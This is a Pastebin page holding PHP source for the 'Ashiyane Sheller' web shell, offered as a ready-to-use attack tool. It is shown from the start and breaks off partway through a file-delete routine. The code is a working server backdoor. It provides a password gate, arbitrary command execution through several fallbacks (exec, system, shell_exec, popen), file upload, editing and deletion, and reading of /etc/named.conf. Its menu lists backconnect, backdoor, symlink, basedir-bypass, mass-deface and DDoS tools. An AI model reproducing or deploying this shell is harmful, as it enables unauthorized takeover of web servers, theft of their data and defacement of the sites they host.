API tools faq
paste
Advertisement
GLADzTeguhID

ASHIYANE SHELL By Mahdi.Hidden

GLADzTeguhID
Oct 3rd, 2016
436
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 29.30 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. //Coded By Mahdi.Hidden ~ Ashiyane Digital Security Team
  3. /*
  4. __ __ _ _ _ _ _ _ _ _
  5. | \/ | __ _| |__ __| (_) | | | (_) __| | __| | ___ _ __
  6. | |\/| |/ _ | _ \ / _` | | | |_| | |/ _` |/ _` |/ _ \ _ \
  7. | | | | (_| | | | | (_| | |_| _ | | (_| | (_| | __/ | | |
  8. |_| |_|\__ _|_| |_|\__ _|_(_)_| |_|_|\__ _|\__ _|\___|_| |_| ASHIYANE SHELLER BY MAHDI.HIDDEN
  9. */
  10. $auth_pass = ""; // Put your password here.
  11. @session_start();
  12. function Login() {
  13. die("
  14. <title>Ashiyane Sheller</title>
  15. <form method=post>
  16. <label for=pass>Password: </label><input type=password name=pass><input type=submit value='>>'>
  17. </form>");
  18. }
  19. if(!isset($_SESSION[$_SERVER['HTTP_HOST']]))
  20. if( empty($auth_pass) || ( isset($_POST['pass']) && ($_POST['pass'] == $auth_pass) ) )
  21. $_SESSION[$_SERVER['HTTP_HOST']] = true;
  22. else
  23. Login();
  24.  
  25. //Coded By Mahdi.Hidden ~ Ashiyane Digital Security Team
  26. $db = "";
  27. ob_start();
  28. if(!isset($_GET['action']) or $_GET['action']==""){
  29.  
  30.  
  31. header("location: ?action=explorer");
  32.  
  33.  
  34. }
  35. if(isset($_GET["hiddenshell"])){
  36.  
  37. exit;}
  38. if(ini_get("safe_mode")=="1"){
  39. $safemode="<font>ON</font>";
  40. } else{
  41. $safemode="<font>OFF</font>";
  42. }
  43. if(ini_get("disable_functions")==""){
  44. $disable_functions="<font>NONE</font>";
  45. } else{
  46. $disable_functions=ini_get("disable_functions");
  47. }
  48. if(!function_exists('posix_getegid'))
  49. {
  50. $gid = @getmygid();
  51. $group = "?";
  52. } else
  53. {
  54. $uid = @posix_getpwuid(posix_geteuid());
  55. $gid = @posix_getgrgid(posix_getegid());
  56. $group = $gid['name'];
  57. $gid = $gid['gid'];
  58. }
  59.  
  60. //Start
  61.  
  62. $on="<font> ON </font>";
  63. $of="<font> OFF </font>";
  64. $none="<font> NONE </font>";
  65. if(function_exists('curl_version'))
  66. $curl=$on;
  67. else
  68. $curl=$of;
  69. if(function_exists('mysql_get_client_info'))
  70. $mysql=$on;
  71. else
  72. $mysql=$of;
  73. if(function_exists('mssql_connect'))
  74. $mssql=$on;
  75. else
  76. $mssql=$of;
  77. if(function_exists('pg_connect'))
  78. $pg=$on;
  79. else
  80. $pg=$of;
  81. if(function_exists('oci_connect'))
  82. $or=$on;
  83. else
  84. $or=$of;
  85. if(@ini_get('open_basedir'))
  86. $open_b=@ini_get('open_basedir');
  87. else
  88. $open_b=$none;
  89.  
  90. //End
  91.  
  92. function magicboom($text){
  93. if (!get_magic_quotes_gpc()){
  94. return $text;
  95. }
  96. return stripslashes($text);
  97. }
  98.  
  99. function perms($p) {
  100. if (($p & 0xC000) == 0xC000)$i = 's';
  101. elseif (($p & 0xA000) == 0xA000)$i = 'l';
  102. elseif (($p & 0x8000) == 0x8000)$i = '-';
  103. elseif (($p & 0x6000) == 0x6000)$i = 'b';
  104. elseif (($p & 0x4000) == 0x4000)$i = 'd';
  105. elseif (($p & 0x2000) == 0x2000)$i = 'c';
  106. elseif (($p & 0x1000) == 0x1000)$i = 'p';
  107. else $i = 'u';
  108. $i .= (($p & 0x0100) ? 'r' : '-');
  109. $i .= (($p & 0x0080) ? 'w' : '-');
  110. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  111. $i .= (($p & 0x0020) ? 'r' : '-');
  112. $i .= (($p & 0x0010) ? 'w' : '-');
  113. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  114. $i .= (($p & 0x0004) ? 'r' : '-');
  115. $i .= (($p & 0x0002) ? 'w' : '-');
  116. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  117. return $i;
  118. }
  119. function permsColor($f) {
  120. if (!@is_readable($f))
  121. return '<font color=#FF0000>' . perms(@fileperms($f)) . '</font>';
  122. elseif (!@is_writable($f))
  123. return '<font color=white>' . perms(@fileperms($f)) . '</font>';
  124. else
  125. return '<font color=#25ff00>' . perms(@fileperms($f)) . '</font>';
  126. }
  127. function size($s) {
  128. if($s >= 1073741824)
  129. return sprintf('%1.2f', $s / 1073741824 ). ' GB';
  130. elseif($s >= 1048576)
  131. return sprintf('%1.2f', $s / 1048576 ) . ' MB';
  132. elseif($s >= 1024)
  133. return sprintf('%1.2f', $s / 1024 ) . ' KB';
  134. else
  135. return $s . ' B';
  136. }
  137. function extension($in) {
  138. $out = '';
  139. if (function_exists('exec')) {
  140. @exec($in,$out);
  141. $out = @join("\n",$out);
  142. } elseif (function_exists('passthru')) {
  143. ob_start();
  144. @passthru($in);
  145. $out = ob_get_clean();
  146. } elseif (function_exists('system')) {
  147. ob_start();
  148. @system($in);
  149. $out = ob_get_clean();
  150. } elseif (function_exists('shell_exec')) {
  151. $out = shell_exec($in);
  152. } elseif (is_resource($f = @popen($in,"r"))) {
  153. $out = "";
  154. while(!@feof($f))
  155. $out .= fread($f,1024);
  156. pclose($f);
  157. }
  158. return $out;
  159. }
  160. if (strtolower(substr(PHP_OS,0,3))=="win")
  161. $sys='win';
  162. else
  163. $sys='unix';
  164. $home_path = @getcwd();
  165. $path = @getcwd();
  166. if($sys == 'win')
  167. {
  168. $home_path = str_replace("\\", "/", $home_path);
  169. $path = str_replace("\\", "/", $path);
  170. }
  171.  
  172. if(empty($_GET['dir'])){
  173.  
  174. $path=(dirname($_SERVER['SCRIPT_FILENAME']));
  175. } else{
  176. $path=(htmlspecialchars($_GET['dir']));
  177. }
  178.  
  179. if($path[strlen($path)-1] != '/' )
  180. $path .= '/';
  181. $cwd_links = '';
  182. $path1 = explode("/", $GLOBALS['path']);
  183. $n=count($path1);
  184. for($i=0; $i<$n-1; $i++) {
  185. $cwd_links .= "<a href='?action=explorer&dir=";
  186. for($j=0; $j<=$i; $j++)
  187. $cwd_links .= $path1[$j].'/';
  188. $cwd_links .= "'>".$path1[$i]."/</a>";
  189. }
  190.  
  191. $drives = "";
  192.  
  193. if (class_exists('COM')) {
  194.  
  195. foreach(range('C','Z') as $drive) {
  196. if(is_dir($drive.':\\')){
  197. $fso = new COM('Scripting.FileSystemObject');
  198. $D = $fso->Drives;
  199. $Dr = $fso->GetDrive($drive);
  200. if ($Dr->IsReady ) {
  201. $drives .= '<a href="?action=explorer&dir='.$drive.":".'">[ '.$drive.' ]</a> ';
  202. }
  203. else {
  204. $drives .= '<a href="?action=explorer&dir='.$drive.":".'">[ CD-Rom : '.$drive.' ]</a> ';
  205. }
  206. }
  207. }
  208.  
  209. }
  210.  
  211. if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
  212. function posix_getpwuid($p) {return false;} }
  213. if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
  214. function posix_getgrgid($p) {return false;} }
  215. ?>
  216. <!DOCTYPE HTML>
  217. <html>
  218. <head>
  219. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  220. <link href="http://ashiyane.org/aboutus/images/logo2.png" rel="icon" type="image/x-icon"/>
  221. <title><?php echo $_SERVER['HTTP_HOST']; ?> - Ashiyane Sheller</title>
  222. <style>
  223. body
  224. {
  225. background:#1d1c1c;
  226. color:#e3e3e3;
  227. font-family:Tahoma;
  228. }
  229. h1,h2,h3,h4,h5,h6
  230. {
  231. margin:0px;
  232. padding:0px;
  233. }
  234. a
  235. {
  236. text-decoration: none;
  237. color:inherit;
  238. }
  239. li
  240. {
  241. list-style:none;
  242. }
  243. ul
  244. {
  245. padding:0px ;
  246. margin:0px auto;
  247. }
  248. textarea{
  249. border:2px solid #CE3F3F;
  250. }
  251. #hover tr:hover{
  252. background-color:#CE3F3F;
  253. }
  254. .logo
  255. {
  256. background-image:url('http://ashiyane.org/aboutus/images/logo2.png');
  257. width:182px;
  258. height:134px;
  259. float:left;
  260. }
  261. .main
  262. {
  263. width:90%;
  264. margin:0px auto;
  265. padding:0px;
  266. }
  267. .logout
  268. {
  269. float:right;
  270. background:#990000;
  271. color:#FFF;
  272. background-image:url('http://up.ashiyane.org/images/b5crr7rhrwc5e97nvgxq.png');
  273. padding:5px;
  274. padding-left:20px;
  275. background-position:2px;
  276. background-repeat: no-repeat;
  277.  
  278. }
  279. .description
  280. {
  281. width: 70%;
  282. float: left;
  283. margin-left:20px;
  284. margin-top:10px;
  285. }
  286. .description span
  287. {
  288. font-size:12px;
  289. }
  290. .description span b
  291. {
  292. color:#DD4242;
  293. }
  294. .header
  295. {
  296. width: 95%;
  297. margin-left: auto;
  298. margin-right: auto;
  299. }
  300. .header h1
  301. {
  302. padding: 0px;
  303. margin: 0px;
  304. text-align: center;
  305. border-bottom: 3px solid #A81F1F;
  306. }
  307. .clear
  308. {
  309. clear: both;
  310. }
  311.  
  312. .menu
  313. {
  314.  
  315. margin-top:10px;
  316. }
  317. .menu ul
  318. {
  319.  
  320. width:95%;
  321. margin-left:3%;
  322.  
  323.  
  324. }
  325. .menu ul li:last-child
  326. {
  327. border-right:none;
  328. }
  329. .menu ul li
  330. {
  331. border-top: 3px solid #A81F1F;
  332. background-color:#ce3f3f;
  333. text-align:center;
  334. float:left;
  335. border-right:3px solid #a81f1f;
  336. padding:10px 0px;
  337. width:8%;
  338. font-size:12px;
  339.  
  340. }
  341. .content-box
  342. {
  343. font-size:13px;
  344. background-color:#2D2D2D;
  345. margin-top:10px;
  346. width:94%;
  347. margin-left:auto;
  348. margin-right:auto;
  349. }
  350. .box-main-box
  351. {
  352. padding:10px;
  353. overflow-x:hidden;
  354. }
  355. .content-box table
  356. {
  357. text-align: left;
  358. }
  359. .content-box table tr th
  360. {
  361. color:#BE5757;
  362. }
  363. .content-box table tr:nth-child(2n)
  364. {
  365. background-color:#464444;
  366. }
  367. .box-box
  368. {
  369. float:left;
  370.  
  371. width:45%;
  372. margin-top:10px;
  373. padding:5px;
  374. }
  375. .box-box .title
  376. {
  377. color:#BE5757;
  378. border-bottom:2px solid #BE5757;
  379. padding-bottom:3px;
  380. float:left;
  381. margin-bottom: 10px;
  382. }
  383. input[type="file"],input[type=text]
  384. {
  385. border-radius: 3px;
  386. padding:2px;
  387. color: black;
  388. }
  389.  
  390. input[type=submit],input[type=reset]
  391. {
  392. background-color: #E44242;
  393. color: #FFF;
  394. border: none;
  395. padding: 5px;
  396. border-radius: 3px;
  397. margin-left:5px;
  398. cursor: pointer;
  399. }
  400. input[type=button] {
  401. background-color: #E44242;
  402. color: #FFF;
  403. border: none;
  404. padding: 5px;
  405. border-radius: 3px;
  406. margin-left:5px;
  407. cursor: pointer;
  408. }
  409. .info-file-info li
  410. {
  411. background:rgb(152, 134, 109);
  412. float:left;
  413. margin-right:10px;
  414. padding:5px;
  415. }
  416. .info-file-info li.active
  417. {
  418. background:rgb(163, 95, 95);
  419. }
  420. .syms td{
  421. border:1px solid #A81F1F;
  422. }
  423. .syms tr:hover{
  424. background: #646464;
  425. }
  426. textarea{
  427. padding:10px 10px;
  428. background-color:#ddd;
  429. }
  430. .backdoor li{
  431. background-color: #CE3F3F;
  432. text-align: center;
  433. border: 1px solid #A81F1F;
  434. padding: 10px 0px;
  435. font-size: 12px;
  436. }
  437. .backdoor a li{
  438. color:white;
  439. }
  440. .backdoor li{
  441. color:black;
  442. }
  443. </style>
  444.  
  445. </head>
  446. <body>
  447. <div class="main">
  448. <div class="header">
  449. <h1>ASHIYANE SHELLER <span style="font-size: 12px; color: #CE3F3F;">By Mahdi.Hidden</span></h1>
  450. <div class="logo"></div>
  451. <div class="description">
  452. <span style=""><b>Server IP : </b> <?php echo $_SERVER['SERVER_ADDR']; ?></span>
  453. <span style=""><b>Your IP : </b> <?php echo $_SERVER['REMOTE_ADDR']; ?></span><br>
  454. <span style=""><b>System : </b> <?php echo php_uname(); ?></span><br>
  455. <span style=""><b>Software : </b> <?php echo getenv("SERVER_SOFTWARE"); ?></span>
  456. <span style=""><b>User: </b><?php echo get_current_user()." "; ?></span><span>Group: <?php echo $gid ." [ $group ] ";?></span><br />
  457. <span style=""><b>Safemode : </b><?php echo $safemode; ?></span>
  458. <span><b>Open_Basedir : </b><?php echo $open_b;?></span><BR />
  459. <span><b>CURL:</b><?php echo $curl; ?><span><b>MySQL:</b></span><?php echo $mysql; ?><span><b>MsSQL:</b></span><?php echo $mssql; ?><span><b>PostgreSQL:</b></span><?php echo $pg?><span><b>Oracle:</b></span><?php echo $or?></span><br />
  460. <span><b>Domains:</b></span>
  461. <?php
  462. if($GLOBALS['sys']=='unix')
  463. {
  464. $d0mains = @file("/etc/named.conf");
  465. if(!$d0mains)
  466. {
  467. echo "<span>CANT READ named.conf</span>";
  468. }
  469. else
  470. {
  471. $count;
  472. foreach($d0mains as $d0main)
  473. {
  474. if(@ereg("zone",$d0main))
  475. {
  476. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  477. flush();
  478. if(strlen(trim($domains[1][0])) > 2){
  479. flush();
  480. $count++;
  481. }
  482. }
  483. }
  484. echo "<span>$count Domains</span>";
  485. }
  486. }
  487. else{ echo"<span>CANT READ |Windows|</span>";}
  488. ?>
  489. <br />
  490. <?php
  491. echo '<tr>
  492. <td height="12"><span><b>Path:</b></span></td>
  493. <td colspan="2"><span>'.$cwd_links.' <a href="?action=explorer&dir='.$GLOBALS['home_path'].'"><font color=#DD4242 >| Home Directory |</font></a></span></td>
  494. </tr>';
  495. ?><br />
  496. <span style=""><?php echo $drives; ?></span><br />
  497. <br />
  498. </div>
  499. <div class="logout"><a href="?action=logout">Logout</a></div>
  500. <div class="clear"></div>
  501.  
  502. </div>
  503. <div class="menu">
  504. <ul>
  505. <li id="explorer"><a href="?action=explorer&dir=<?php echo $path ?>">HOME</a></li>
  506. <li id="terminal"><a href="?action=terminal&dir=<?php echo $path ?>">TERMINAL</a></li>
  507. <li id="eval"><a href="?action=eval&dir=<?php echo $path ?>">EVAL</a></li>
  508. <li id="sym"><a href="?action=sym&dir=<?php echo $path ?>">SYMLINKER</a></li>
  509. <li id="basedir"><a href="?action=basedir&dir=<?php echo $path ?>">OPEN BASEDIR</a></li>
  510. <li id="sql"><a href="?action=sql&dir=<?php echo $path ?>">SQL</a></li>
  511. <li id="cgiashiyane"><a href="?action=cgiashiyane&dir=<?php echo $path ?>">CGI-TELNET</a></li>
  512. <li id="bc"><a href="?action=bc&dir=<?php echo $path ?>">BACKCONNECT</a></li>
  513. <li id="backdoor"><a href="?action=backdoor&dir=<?php echo $path ?>">BACKDOOR</a></li>
  514. <li id="othertools"><a href="?action=othertools&dir=<?php echo $path ?>" title="Other Tools:
  515. Zone-h Mass Deface Poster
  516. Ddoser
  517. SQLi Target Finder
  518. Mass Defacer
  519. Zipper
  520. Fake Mail
  521. PHP To XML
  522. Bypass Disable Functions
  523. Hash Cracker
  524. PHP Info">OTHER TOOLS</a></li>
  525. <li id="aboutus"><a href="?action=aboutus&dir=">ABOUTUS</a></li>
  526. <li id="rmshell"><a href="?action=rmshell">REMOVE</a></li>
  527. </ul>
  528. </div>
  529.  
  530. <div class="clear"></div>
  531. <div class="content-box">
  532. <div class="box-main-box">
  533. <?php
  534.  
  535. if(isset($_GET['action'])){
  536.  
  537. $action=htmlspecialchars($_GET['action']);
  538.  
  539. if($action=="explorer"){
  540. echo "<style>#explorer{background: #A81F1F}</style>";
  541. ?>
  542. <br />
  543. <div class="explorer">
  544. <?php
  545.  
  546. $files = scandir($path);
  547. ?>
  548. <table id="hover">
  549. <th style="min-width:300px;">Name</th><th style="width:150px;">Size</th><th style="min-width:300px;">Modify</th><th style="width:300px;">Owner/Group<th style="width:150px;">Permission</th><th colspan=4>Actions</th>
  550. <?php
  551. $directories = array();
  552. $files_list = array();
  553.  
  554. foreach($files as $entry){
  555. $entry_link=$path.$entry;
  556. $entry_link= ($entry_link);
  557. if(!is_file($entry_link)){
  558. $directories[] = $entry;
  559.  
  560.  
  561. } else {
  562. $files_list[] = $entry;
  563.  
  564. }
  565.  
  566. }
  567.  
  568.  
  569. ?>
  570.  
  571.  
  572. <?php
  573. foreach($directories as $directory){
  574. $entry_link=$path.$directory;
  575. $entry_link= ($entry_link);
  576. if($directory==".."){
  577. ?>
  578. <tr><td style="min-width:300px;"><?php
  579. $entry_link2=realpath($entry_link);
  580. $entry_link2=str_replace("\\","/",$entry_link2);
  581. echo "<a href=\"?action=explorer&dir=$entry_link2\">| $directory |</a></td>";
  582.  
  583. ?>
  584. <td style="width:150px"><?php echo (is_file($entry_link)?size(filesize($entry_link)):'dir');?></td>
  585. <td style="min-width:300px;">
  586.  
  587. <?php echo @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $entry_link));?>
  588.  
  589. </td>
  590. <td style="width:300px">
  591. <?php
  592.  
  593. $ow = @posix_getpwuid(@fileowner($entry_link));
  594. $gr = @posix_getgrgid(@filegroup($entry_link));
  595.  
  596. echo $ow['name']?$ow['name']:@fileowner($entry_link);
  597. echo "/";
  598. echo $gr['name']?$gr['name']:@filegroup($entry_link);
  599.  
  600.  
  601. ?>
  602. <td style="width:150px"><a href="?action=ff&go=perm&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $directory;?>#down" title="Edit Permission"><?php echo permsColor($entry_link); ?></a></td>
  603. <td><a href="?action=ff&go=rename&file=<?php echo urlencode($directory); ?>&dir=<?php echo $path ?>&f=<?php echo $directory;?>#down" title="Rename">R</a></td>
  604. <td><a href="?action=ff&go=touch&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $directory;?>#down" title="Touch">T</a></td>
  605. <td><a title="Remove" href="?action=ff&dir=<?php echo $path?>&go=delete&f=<?php echo $entry_link ?>">X</a></td>
  606. </tr>
  607. <?php
  608. }
  609. if($directory!="." && $directory!=".."){
  610. ?>
  611. <tr><td style="min-width:300px;"><?php
  612.  
  613. echo "<a href=\"?action=explorer&dir=$entry_link\">| $directory |</a></td>";
  614.  
  615. ?>
  616. <td style="width:150px"><?php echo (is_file($entry_link)?size(filesize($entry_link)):'dir');?></td>
  617. <td style="min-width:300px;">
  618.  
  619. <?php echo @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $entry_link));?>
  620.  
  621. </td>
  622. <td style="width:300px">
  623. <?php
  624.  
  625. $ow = @posix_getpwuid(@fileowner($entry_link));
  626. $gr = @posix_getgrgid(@filegroup($entry_link));
  627.  
  628. echo $ow['name']?$ow['name']:@fileowner($entry_link);
  629. echo "/";
  630. echo $gr['name']?$gr['name']:@filegroup($entry_link);
  631.  
  632.  
  633. ?>
  634. <td style="width:150px"><a href="?action=ff&go=perm&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $directory;?>#down" title="Edit Permission"><?php echo permsColor($entry_link); ?></a></td>
  635. <td><a href="?action=ff&go=rename&file=<?php echo urlencode($directory); ?>&dir=<?php echo $path ?>&f=<?php echo $directory;?>#down" title="Rename">R</a></td>
  636. <td><a href="?action=ff&go=touch&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $directory;?>#down" title="Touch">T</a></td>
  637. <td><a title="Remove" href="?action=ff&dir=<?php echo $path?>&go=delete&f=<?php echo $entry_link ?>">X</a></td>
  638. </tr>
  639. <?php
  640.  
  641. }
  642. }
  643. ?>
  644.  
  645. </td>
  646. </tr>
  647. <?php
  648.  
  649. foreach($files_list as $file_list){
  650. $entry_link=$path.$file_list;
  651. $entry_link= ($entry_link);
  652.  
  653. ?><tr><td style="min-width:300px;"><?php
  654. echo "<a href=\"?action=ff&go=view&file=$entry_link&dir=$path&f=$file_list#down\">$file_list</a></td>"
  655. ;?>
  656. <td style="width:150px"><?php echo (is_file($entry_link)?size(filesize($entry_link)):'dir');?></td>
  657. <td style="min-width:300px;">
  658.  
  659. <?php echo @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $entry_link));?>
  660.  
  661. </td>
  662. <td style="width:300px">
  663. <?php
  664.  
  665. $ow = @posix_getpwuid(@fileowner($entry_link));
  666. $gr = @posix_getgrgid(@filegroup($entry_link));
  667.  
  668. echo $ow['name']?$ow['name']:@fileowner($entry_link);
  669. echo "/";
  670. echo $gr['name']?$gr['name']:@filegroup($entry_link);
  671.  
  672.  
  673. ?>
  674. <td style="width:150px"><a href="?action=ff&go=perm&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $file_list;?>#down"><?php echo permsColor($entry_link); ?></a></td>
  675. <td><a title="Rename" href="?action=ff&go=rename&file=<?php echo urlencode($file_list); ?>&dir=<?php echo $path ?>&f=<?php echo $file_list;?>#down">R</a></td>
  676. <td><a title="Touch" href="?action=ff&go=touch&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $file_list;?>#down">T</a></td>
  677. <td><a title="Edit" href="?action=ff&go=edit&file=<?php echo $entry_link ?>&dir=<?php echo $path ?>&f=<?php echo $file_list;?>#down">E</a></td>
  678. <td><a title="Download" href="?action=ff&dir=<?php echo $path?>&go=download&file=<?php echo $entry_link; ?>">D</a></td>
  679. <td><a title="Remove" href="?action=ff&dir=<?php echo $path?>&go=delete&f=<?php echo $entry_link ?>">X</a></td>
  680.  
  681. </tr>
  682. <?php
  683. }
  684. ?>
  685.  
  686.  
  687.  
  688. </table>
  689.  
  690. <a name="down"></a>
  691. <table style="float:left">
  692. <tr>
  693. <?php
  694.  
  695. if(!is_writable($GLOBALS['path']))
  696. {
  697. echo "
  698. <style>
  699. .dir {
  700. background:red;
  701. }
  702. </style>
  703. ";
  704. } else{
  705. echo "
  706. <style>
  707. .dir{
  708. background:#e3e3e3;
  709. }
  710. </style>
  711. ";
  712. }
  713.  
  714. ?>
  715. <hr>
  716. <div class="box-box">
  717. <div class="title"><h3>Upload File & Execute(CMD)</h3></div>
  718. <div class="clear"></div>
  719. <form action="" enctype="multipart/form-data" method="POST">
  720. <span>Select File: </span><input type="file" class="dir" name="userfile" style=" width: 238px;" /><input type="hidden" name="path" value="<?php echo $path ?>" /><input type="hidden" value="upload" name="type" /><input type="submit" value="Upload File" />
  721. </form><br><br>
  722. <form action="?action=terminal&CMD=shell#down" method="post">
  723. <span>Terminal : </span>
  724. <input onMouseOver="this.focus();" id="cmd" class="input dir" type="text" name="cmd" style=" width: 238px;" value="" />
  725. <input class="inputbutn" type="submit" value="Execute" name="submitcmd" />
  726.  
  727. </form>
  728. </div>
  729. <div class="box-box">
  730. <div class="title"><h3>File & Folder Maker</h3></div>
  731. <div class="clear"></div>
  732. <form action="" enctype="multipart/form-data" method="POST">
  733. <span>Make Folder: &nbsp;</span><input type="hidden" value="makefolder" name="type" /><input type="text" class="dir" name="namefolder" /><input type="submit" value="Make Folder" />
  734. </form>
  735. <br><br>
  736. <form action="" enctype="multipart/form-data" method="POST">
  737. <span>Make File: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><input type="hidden" value="makefile" name="type" /><input type="text" class="dir" name="namefile" /><input type="submit" value="Make File" />
  738. </form>
  739. </div>
  740. </tr>
  741. </table>
  742.  
  743. <?php
  744.  
  745.  
  746. if(isset($_POST['type']) && $_POST['type']=="upload"){
  747. if(isset($_FILES['userfile'])){
  748. $upload_dir=$_POST['path'];
  749. $upload_file=$upload_dir."/".basename($_FILES['userfile']['name']);
  750.  
  751. if(move_uploaded_file($_FILES['userfile']['tmp_name'],$upload_file)){
  752. echo "ok";
  753. header("location: ?action=explorer&dir=$path");
  754. }
  755.  
  756. }
  757. }
  758.  
  759. if(isset($_POST['type']) && $_POST['type']=="makefolder"){
  760.  
  761. if(isset($_POST['namefolder']) && $_POST['namefolder']!=""){
  762. $foldername=$path.$_POST['namefolder'];
  763. if(mkdir($foldername)){
  764. echo "ok";
  765. header("location: ?action=explorer&dir=$path");
  766. } else {
  767. echo "can't be make folder";
  768. }
  769. } else{
  770. echo "enter folder name";
  771. }
  772. }
  773.  
  774. if(isset($_POST['type']) && $_POST['type']=="makefile"){
  775.  
  776. if(isset($_POST['namefile']) && $_POST['namefile']!=""){
  777. $fn=$_POST['namefile'];
  778. $filename=$path.$_POST['namefile'];
  779. if(!file_exists($filename)){
  780. if(touch($filename)){
  781.  
  782. $fp = fopen($filename, "w");
  783. if ($fp) {
  784.  
  785. fclose($fp);
  786. header("location: ?action=ff&go=edit&file=$filename&dir=$path&f=$fn#down");
  787. }
  788.  
  789. }
  790.  
  791. echo "ok";
  792.  
  793. } else {
  794. header("location: ?action=ff&go=edit&file=$filename&dir=$path&f=$fn#down");
  795. }
  796. } else{
  797. echo "enter file name";
  798. }
  799. }
  800.  
  801. ?>
  802.  
  803. </div>
  804.  
  805. <?php
  806.  
  807.  
  808. }
  809.  
  810. if($action=="ff"){
  811.  
  812.  
  813. if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="download" && $_GET['file']!='' ){
  814.  
  815. ob_end_clean();
  816. $_GET['file'] = urldecode($_GET['file']);
  817. if(is_file($_GET['file']) && is_readable($_GET['file'])) {
  818. ob_start("ob_gzhandler", 4096);
  819.  
  820. header("Content-Disposition: attachment; filename=".basename($_GET['file']));
  821. if (function_exists("mime_content_type")) {
  822. $type = mime_content_type($_GET['file']);
  823. header("Content-Type: " . $type);
  824. } else {
  825. header("Content-Type: application/octet-stream");
  826. }
  827. $fp = fopen($_GET['file'], "r");
  828. if($fp) {
  829. while(!feof($fp))
  830. echo fread($fp, 1024);
  831. fclose($fp);
  832. }
  833. }exit;
  834.  
  835.  
  836. }
  837. ob_start();
  838. function info(){
  839. global $path;
  840. echo "<ul class=\"info-file-info\">";
  841. $f2 = (htmlspecialchars($_GET['f']));
  842. $file2 = htmlspecialchars($_GET['file']);
  843. echo "<a href=\"?action=ff&go=rename&file=$file2&dir=$path&f=$f2#down\"><li class='active'>Name: ".htmlspecialchars($_GET['f'])."</li></a>";
  844. if(!is_dir($file2)){
  845. echo "<a href=\"?action=ff&go=view&file=$file2&dir=$path&f=$f2#down\"><li class='active'>View: ".htmlspecialchars($_GET['f'])."</li></a>";
  846. echo "<a href=\"?action=ff&go=edit&file=$file2&dir=$path&f=$f2#down\"><li class='active'>Edit: ".htmlspecialchars($_GET['f'])."</li></a>";
  847. }
  848. echo "<a href=\"?action=ff&go=touch&file=$file2&dir=$path&f=$f2#down\"><li class='active'>Tuoch: ".@date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $file2))."</li></a>";
  849. echo "<li>Size: ".(is_file($_GET['file'])?size(filesize($_GET['file'])):'-')."</li>";
  850. echo "<a href=\"?action=ff&go=perm&file=$file2&dir=$path&f=$f2#down\"><li class='active'>Permissions: ".permsColor($_GET['file'])."</li></a>";
  851. $ow = @posix_getpwuid(@fileowner($_GET['file']));
  852. $gr = @posix_getgrgid(@filegroup($_GET['file']));
  853. echo "<li>Owner/Group: ";
  854. echo $ow['name']?$ow['name']:@fileowner($_GET['file']);
  855. echo "/";
  856. echo $gr['name']?$gr['name']:@filegroup($_GET['file']);
  857. echo "</li>";
  858. echo "</ul>";
  859. echo "<div class=\"clear\"></div>";
  860.  
  861. }
  862. //Coded By Mahdi.Hidden ~ Ashiyane Digital Security Team
  863. ?>
  864. <div style="text-align:left">
  865. <?php
  866. info();
  867. ?>
  868. <?php
  869. if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="rename" ){
  870. $f3 = htmlspecialchars($_GET['f']);
  871. $f4 = htmlspecialchars($_GET['file']);
  872. if(isset($_POST['name'])){
  873. $nname=$_GET['dir'].$_POST['name'];
  874. $nn=$_POST['name'];
  875. $oname=$_GET['dir'].$_POST['file'];
  876. if(@rename($oname,$nname)){
  877. header("location: ?action=ff&go=rename&dir=$path&file=$nname&f=$nn");
  878. } else {
  879. echo "can't rename";
  880. }
  881. }
  882. ?>
  883. <a name="down"></a><br><span>Rename File:</span><form action="?action=ff&go=rename&dir=<?php echo htmlspecialchars($path)?>&file=<?php echo htmlspecialchars($_GET['file']);?>&f=<?php echo htmlspecialchars($_GET['f']);?>#down" method="post"><input type=text name=name value="<?php echo htmlspecialchars($_GET['f']);?>"><input type="hidden" name="file" value="<?php echo htmlspecialchars($_GET['f']);?>"><input type=submit value="Rename"></form>
  884. <?php
  885. }
  886. if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="view" && $_GET['file']!="" ){
  887. echo '<a name="down"></a><br><span>View File:</span><pre style="border:2px solid #CE3F3F;padding:5px;margin:0;overflow: auto;background:whitesmoke;">';
  888.  
  889. $fp = @fopen(highlight_file($_GET['file'],FALSE), 'r');
  890.  
  891. if($fp) {
  892. while( !@feof($fp) )
  893. echo htmlspecialchars(@fread($fp, 1024));
  894. @fclose($fp);
  895. }
  896. echo '</pre>';
  897.  
  898. }
  899. if(isset($_GET['go']) && isset($_GET['f']) && $_GET['go']=="delete" && $_GET['f']!="" ){
  900. function deleteDir($path) {
  901. $path = (substr($path,-1)=='/') ? $path:$path.'/';
  902. $dh = opendir($path);
  903. while ( ($item = readdir($dh) ) !== false) {
  904. $item = $path.$item;
  905. if ( (basename($item) == "..") || (basename($item) == ".") )
  906. continue;
  907. $type = filetype($item);
  908. if ($type == "dir")
  909. deleteDir($item);
  910. else
  911. @unlink($item);
  912. }
